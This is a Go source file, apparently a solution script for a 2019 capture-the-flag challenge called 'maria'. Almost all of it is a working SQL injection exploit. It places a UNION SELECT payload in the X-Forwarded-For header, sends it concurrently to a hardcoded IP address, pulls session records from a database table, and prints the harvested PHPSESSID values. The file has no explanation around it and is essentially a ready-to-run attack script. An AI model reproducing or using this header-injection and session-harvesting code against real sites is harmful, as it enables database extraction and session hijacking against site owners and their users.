https://cybertalents.com/competitions/quals-saudi-oman-national-cyber-security-ctf-2019/maria/

maria.go

// https://cybertalents.com/competitions/quals-saudi-oman-national-cyber-security-ctf-2019/maria/
// 🂁 ctrezevant@sdf ~ $ time go run ctf.go
// go run ctf.go  1.17s user 0.45s system 48% cpu 3.341 total

package main

import (
	"fmt"
	"math/rand"
	"net/http"
	"regexp"
	"sync"
	"time"
)

func main() {

	url := "http://35.222.174.178/maria/"
	payload := "kfdad' or id = '6969' union select 'test',1,2,(select ip_address from nxf8_sessions WHERE id=%d) from nxf8_sessions--"


	wg := &sync.WaitGroup{}
	for i := 0; i < 30; i++ {
		go (func(wg *sync.WaitGroup, url, payload *string, offset int) {
			wg.Add(1)
			time.Sleep(time.Duration(rand.Intn(3) + 3) * time.Microsecond)
			sendPayload(url, payload, offset)
			wg.Done()
		})(wg, &url, &payload, i)
	}

	wg.Wait()
}

func sendPayload(url, query *string, offset int) {
	client := &http.Client{}

	req, err := http.NewRequest("GET", *url, nil)
	if err != nil {
		fmt.Print("sendPayload: " + err.Error())
		return
	}

	req.Header.Add("X-Forwarded-For", fmt.Sprintf(*query, offset))

	res, err := client.Do(req)
	if err != nil {
		fmt.Print("sendPayload: " + err.Error())
		return
	}

	if res == nil || res.StatusCode != 200 {
		fmt.Printf("sendPayload: response is nil or != 200 for offset %d", offset)
		return
	}

	isIP := regexp.MustCompile(`^[^a-zA-Z]+$`).MatchString
	var ipAddr string
	var sessionID string

	for _, cookie := range res.Cookies() {
		if  isIP(cookie.Value) && cookie.Name == "PHPSESSID" {
			ipAddr = cookie.Value
		}
		if !isIP(cookie.Value) && cookie.Value != "deleted" && cookie.Name == "PHPSESSID" {
			sessionID = cookie.Value
		}
	}

	if ipAddr != "" && sessionID != "" {
		fmt.Printf("[ID: %d IP: %s SESSID: %s]\n", offset, ipAddr, sessionID)
	}
}